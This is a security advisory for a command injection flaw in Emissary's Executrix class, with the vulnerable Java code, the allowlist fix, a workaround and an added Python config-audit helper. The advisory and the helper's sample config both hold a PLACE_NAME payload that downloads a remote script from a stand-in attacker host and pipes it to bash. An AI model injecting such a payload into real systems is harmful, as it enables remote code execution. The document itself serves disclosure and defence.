HIGH 7.2 Maven

Emissary has a Command Injection via PLACE_NAME Configuration in Executrix

GHSA-6c37-7w4p-jg9v · CVE-2026-35581


Description

Summary

The Executrix utility class constructed shell commands by concatenating
configuration-derived values — including the PLACE_NAME parameter — with
insufficient sanitization. Only spaces were replaced with underscores, allowing
shell metacharacters (;, |, $, `, (, ), etc.) to pass through
into /bin/sh -c command execution.

Details

Vulnerable code — Executrix.java

Insufficient sanitization (line 132):

this.placeName = this.placeName.replace(' ', '_');
// ONLY replaces spaces — shell metacharacters pass through

Shell sink (line 1052–1058):

// tmpNames[DIR] is derived from placeName and is spliced, unquoted, into a /bin/sh -c string
protected String[] getTimedCommand(final String c) {
    return new String[] {"/bin/sh", "-c", "ulimit -c 0; cd " + tmpNames[DIR] + "; " + c};
}

Data flow

  1. PLACE_NAME is read from a configuration file
  2. Executrix applies only a space-to-underscore replacement
  3. The placeName is used to construct temporary directory paths (tmpNames[DIR])
  4. tmpNames[DIR] is concatenated into a shell command string
  5. The command is executed via /bin/sh -c

Example payload

PLACE_NAME = "test;curl attacker.com/shell.sh|bash;x"

After the original sanitization: test;curl_attacker.com/shell.sh|bash;x
(semicolons, pipes, and other metacharacters preserved)

Impact

  • Arbitrary command execution on the Emissary host
  • Requires the ability to control configuration values (e.g., administrative
    access or a compromised configuration source)

Remediation

Fixed in PR #1290, merged into release 8.39.0.

The space-only replacement was replaced with an allowlist regex that strips all
characters not matching [a-zA-Z0-9_-]:

import java.util.regex.Pattern;

// Anything outside the allowlist [a-zA-Z0-9_-] is treated as invalid
protected static final Pattern INVALID_PLACE_NAME_CHARS = Pattern.compile("[^a-zA-Z0-9_-]");

// Replaces every disallowed character with an underscore before the value reaches a command string
protected static String cleanPlaceName(final String placeName) {
    return INVALID_PLACE_NAME_CHARS.matcher(placeName).replaceAll("_");
}

This ensures that any shell metacharacter in the PLACE_NAME configuration
value is replaced with an underscore before it can reach a command string.

Tests were added to verify that parentheses, slashes, dots, hash, dollar signs,
backslashes, quotes, semicolons, carets, and at-signs are all sanitized.

Workarounds

If upgrading is not immediately possible, ensure that PLACE_NAME values in all
configuration files contain only alphanumeric characters, underscores, and hyphens.
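An added audit helper for the workaround above, not Emissary's own code: it reproduces the pre-fix and post-fix sanitizers in Python and flags PLACE_NAME values in a configuration file that the allowlist would alter. The `PLACE_NAME = "value"` line syntax of the constructed sample config is an assumption.

```python
import re
from typing import List

# Allowlist from the fix (PR #1290): any character outside [a-zA-Z0-9_-] is invalid.
INVALID_PLACE_NAME_CHARS = re.compile(r"[^a-zA-Z0-9_-]")
# Matches 'PLACE_NAME = "value"' lines; the exact config syntax is an assumption.
PLACE_NAME_LINE = re.compile(r'^\s*PLACE_NAME\s*=\s*"?(?P<value>[^"\n]*?)"?\s*$')

# Constructed sample config, not a real Emissary configuration file.
SAMPLE_CONFIG = """\
# constructed sample
PLACE_NAME = "SafePlace_01"
PLACE_NAME = "test;curl attacker.com/shell.sh|bash;x"
PLACE_NAME = "Place Two"
"""


def original_sanitize(place_name: str) -> str:
    """Pre-fix behaviour: only spaces become underscores, metacharacters survive."""
    return place_name.replace(" ", "_")


def fixed_sanitize(place_name: str) -> str:
    """cleanPlaceName() from the fix: every disallowed character becomes '_'."""
    return INVALID_PLACE_NAME_CHARS.sub("_", place_name)


def is_safe_place_name(place_name: str) -> bool:
    """True when the value already satisfies the allowlist (the stated workaround)."""
    return place_name != "" and INVALID_PLACE_NAME_CHARS.search(place_name) is None


def audit_config(text: str) -> List[dict]:
    """Return one finding per PLACE_NAME line whose value the allowlist would change."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = PLACE_NAME_LINE.match(line)
        if not m:
            continue
        value = m.group("value")
        bad = sorted(set(INVALID_PLACE_NAME_CHARS.findall(value)))
        if bad:
            findings.append({"line": lineno, "value": value,
                             "invalid_chars": bad, "would_become": fixed_sanitize(value)})
    return findings


if __name__ == "__main__":
    for f in audit_config(SAMPLE_CONFIG):
        print(f"line {f['line']}: {f['value']!r} contains {f['invalid_chars']} -> {f['would_become']!r}")
```

Any finding means the value would have reached /bin/sh -c unchanged on an unpatched build and should be rewritten to the allowlisted form.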
